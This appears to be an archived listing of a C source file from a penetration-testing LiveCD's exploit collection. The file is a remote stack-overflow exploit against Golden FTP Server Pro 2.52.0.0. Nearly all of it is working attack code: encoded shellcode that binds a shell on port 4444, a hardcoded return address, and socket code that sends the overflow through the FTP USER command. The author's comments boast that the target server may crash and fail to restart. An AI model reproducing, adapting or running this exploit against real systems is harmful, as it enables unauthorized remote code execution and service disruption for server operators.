Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / goldenftp / goldmine.c < prev

Wrap

C/C++ Source or Header | 2005-05-06 | 4KB | 104 lines

/* \ golden ftp 2.52.0.0 remote r00t exploit / \ remote r00t exploit binds 4444 port on remote machine. / tested on: winxp sp0 rus \ / simple stack overflow in golden ftpd. \ if retaddr isn't right, ftpd will crash, and admin will be in big shit / 'coz ftpd won't start later ;) \ / code to be executed, admin must restart or shutdown ftpd... then ftpd will execute eviLDuDe'Z c0de ) \ / gr33tz: choix, nekd0, xtix, crash-x, coki, rave, antiq, xoce, shi, 'em, lp, spekterX, edisan, c0wboy \ ilja, esDee, blackhatz.inf0, sk3w / p.s }:+ EvILduDe \ (c) uKt research '04/'05 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock.h> #include <windows.h> #define RETADDR 0x77F510B0 char shellcode[]= // binds 4444 port "\xd9\xEE\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xb1\xbe" "\x94\x1d\x83\xeb\xfc\xe2\xf4\x4d\x56\xc2\x1d\xb1\xbe\xc7\x48\xe7" "\xe9\x1f\x71\x95\xa6\x1f\x58\x8d\x35\xc0\x18\xc9\xbf\x7e\x96\xfb" "\xa6\x1f\x47\x91\xbf\x7f\xfe\x83\xf7\x1f\x29\x3a\xbf\x7a\x2c\x4e" "\x42\xa5\xdd\x1d\x86\x74\x69\xb6\x7f\x5b\x10\xb0\x79\x7f\xef\x8a" "\xc2\xb0\x09\xc4\x5f\x1f\x47\x95\xbf\x7f\x7b\x3a\xb2\xdf\x96\xeb" "\xa2\x95\xf6\x3a\xba\x1f\x1c\x59\x55\x96\x2c\x71\xe1\xca\x40\xea" "\x7c\x9c\x1d\xef\xd4\xa4\x44\xd5\x35\x8d\x96\xea\xb2\x1f\x46\xad" "\x35\x8f\x96\xea\xb6\xc7\x75\x3f\xf0\x9a\xf1\x4e\x68\x1d\xda\x30" "\x52\x94\x1c\xb1\xbe\xc3\x4b\xe2\x37\x71\xf5\x96\xbe\x94\x1d\x21" "\xbf\x94\x1d\x07\xa7\x8c\xfa\x15\xa7\xe4\xf4\x54\xf7\x12\x54\x15" "\xa4\xe4\xda\x15\x13\xba\xf4\x68\xb7\x61\xb0\x7a\x53\x68\x26\xe6" "\xed\xa6\x42\x82\x8c\x94\x46\x3c\xf5\xb4\x4c\x4e\x69\x1d\xc2\x38" "\x7d\x19\x68\xa5\xd4\x93\x44\xe0\xed\x6b\x29\x3e\x41\xc1\x19\xe8" "\x37\x90\x93\x53\x4c\xbf\x3a\xe5\x41\xa3\xe2\xe4\x8e\xa5\xdd\xe1" "\xee\xc4\x4d\xf1\xee\xd4\x4d\x4e\xeb\xb8\x94\x76\x8f\x4f\x4e\xe2" "\xd6\x96\x1d\xa0\xe2\x1d\xfd\xdb\xae\xc4\x4a\x4e\xeb\xb0\x4e\xe6" "\x41\xc1\x35\xe2\xea\xc3\xe2\xe4\x9e\x1d\xda\xd9\xfd\xd9\x59\xb1" "\x37\x77\x9a\x4b\x8f\x54\x90\xcd\x9a\x38\x77\xa4\xe7\x67\xb6\x36" "\x44\x17\xf1\xe5\x78\xd0\x39\xa1\xfa\xf2\xda\xf5\x9a\xa8\x1c\xb0" "\x37\xe8\x39\xf9\x37\xe8\x39\xfd\x37\xe8\x39\xe1\x33\xd0\x39\xa1" "\xea\xc4\x4c\xe0\xef\xd5\x4c\xf8\xef\xc5\x4e\xe0\x41\xe1\x1d\xd9" "\xcc\x6a\xae\xa7\x41\xc1\x19\x4e\x6e\x1d\xfb\x4e\xcb\x94\x75\x1c" "\x67\x91\xd3\x4e\xeb\x90\x94\x72\xd4\x6b\xe2\x87\x41\x47\xe2\xc4" "\xbe\xfc\xed\x3b\xba\xcb\xe2\xe4\xba\xa5\xc6\xe2\x41\x44\x1d"; int main ( int argc, char *argv[] ) { WSADATA wsa; SOCKET sock; char data[6667], evil[7776]; struct sockaddr_in addr; printf("\n\n >> Golden FTP Server Pro 2.52.0.0 Remote Root Exploit <<\n :: by darkeagle [unl0ck] ::\n >> http://unl0ck.org <<\n\n"); WSAStartup(MAKEWORD(2,0), &wsa); if ( argc < 3 ) { printf(" >usage: %s <ip> <port>\n\n", argv[0]); exit(0); } printf(" [*] ip: %s, port: %d\n", argv[1], atoi(argv[2])); addr.sin_family = AF_INET; addr.sin_port = htons(atoi(argv[2])); addr.sin_addr.s_addr = inet_addr(argv[1]); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); memset(data, 0x00, sizeof(data)); memset(evil, 0x00, sizeof(evil)); memset(data, 0x55, 372); *(long*)&data[332] = RETADDR; memcpy(data, &shellcode, sizeof(shellcode)); printf(" [`] connecting...\n"); if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) > 0 ) { printf(" [+] connected\n"); } else { exit(0); } sprintf(evil, "USER %s\r\nPASS\r\n", data); Sleep(1000); send(sock, evil, strlen(evil), 1); printf(" [+] send. w8ing while ftpd will reboot...\n\n"); closesocket(sock); WSACleanup(); return 0; }